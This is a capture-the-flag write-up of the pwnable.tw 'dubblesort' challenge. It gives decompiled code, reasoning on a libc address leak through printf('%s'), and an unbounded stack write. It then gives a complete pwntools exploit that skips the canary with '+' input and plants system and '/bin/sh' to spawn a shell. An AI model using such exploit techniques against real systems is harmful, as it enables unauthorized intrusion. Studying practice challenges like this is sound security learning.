Challenge
Vulnerability
strange character appeared, should check for the leak
it seems to do real sorting of the numbers I entered.
int __cdecl main(int argc, const char **argv, const char **envp)
{
int num_cnt; // eax
unsigned int *ptr_arr; // edi
unsigned int cnt; // esi
unsigned int index; // esi
int result; // eax
int v8; // [esp+8h] [ebp-84h]
unsigned int input_cnt; // [esp+18h] [ebp-74h]
unsigned int arr[8]; // [esp+1Ch] [ebp-70h]
char buf[64]; // [esp+3Ch] [ebp-50h]
unsigned int v12; // [esp+7Ch] [ebp-10h]
v12 = __readgsdword(0x14u);
sub_8B5();
__printf_chk(1, "What your name :", v8);
read(0, buf, 0x40u);
__printf_chk(1, "Hello %s,How many numbers do you what to sort :", buf);
__isoc99_scanf("%u", &input_cnt);
num_cnt = input_cnt;
if ( input_cnt )
{
ptr_arr = arr;
cnt = 0;
do
{
__printf_chk(1, "Enter the %d number : ", cnt);
fflush(stdout);
__isoc99_scanf("%u", ptr_arr);
++cnt;
num_cnt = input_cnt;
++ptr_arr;
}
while ( input_cnt > cnt );
}
SUB_processing(arr, num_cnt);
puts("Result :");
if ( input_cnt )
{
index = 0;
do
__printf_chk(1, "%u ", arr[index++]);
while ( input_cnt > index );
}
result = 0;
if ( __readgsdword(0x14u) != v12 )
SUB_exit();
return result;
}
i can leak the value in stack thanks to printf("%s") !! (at the line no. 18)
But I can't leak the canary because buf's length is 0x40.
What I can leak is libc address. (checked using gdb)
Then, it reads some value and store it in the stack.
The point is, that there is no limit at the number of entering number.
we can overwrite the return address!
But.. what about the canary?
Um.... after such time of worrying I found out that if I entered non-numeric value when scanf("%u"), nothing is written at the stack!
okay, then we can leave the canary as it's very first value.
Processing function performs bubble sort of entered values.
What I have to do is just writing the address of 'system function' and the string '/bin/sh' at appropriate position in the stack and important thing is to make sure that they are not mixed because of sorting process!
FL4G
#!/usr/bin/env python
# pwnable.tw dubblesort
from pwn import *
debug = 0
def leak(offset):
s.recvuntil('name :')
s.send('a' * offset * 4)
s.recvuntil('Hello '+'a' * offset*4)
re = u32(s.recv(4))
if debug:
log.info('raw leak : '+hex(re))
return re
def send_num(num):
s.recvuntil('number : ')
s.sendline(num)
def exploit():
libc_base = leak(7) - 0x1ae244
if debug:
log.info('libc base : '+hex(libc_base))
if debug:
binsh_offset = 0x15ba0b
system_offset = 0x3ada0
else:
binsh_offset = 0x158e8b
system_offset = 0x3a940
system = libc_base + system_offset
binsh = libc_base + binsh_offset
s.recvuntil('sort :')
s.sendline('35')
for i in range(24):
send_num('1')
send_num('+') # canary
for i in range(8):
send_num(str(system))
send_num(str(binsh))
send_num(str(binsh))
if __name__ == '__main__':
if debug:
#export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:~/pwnable_tw/dubblesort/libc
s = process('./dubblesort')
pause()
else:
s = remote('chall.pwnable.tw', 10101)
exploit()
s.interactive()
s.close()
sol_dubblesort.py
'pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] Silver Bullet writeup (0) | 2018.10.11 |
|---|---|
| [pwnable.tw] hacknote writeup (0) | 2018.10.11 |
| [pwnable.tw] calc writeup (0) | 2018.10.11 |
| [pwnable.tw] orw writeup (0) | 2018.10.11 |
| [pwnable.tw] start writeup (0) | 2018.09.29 |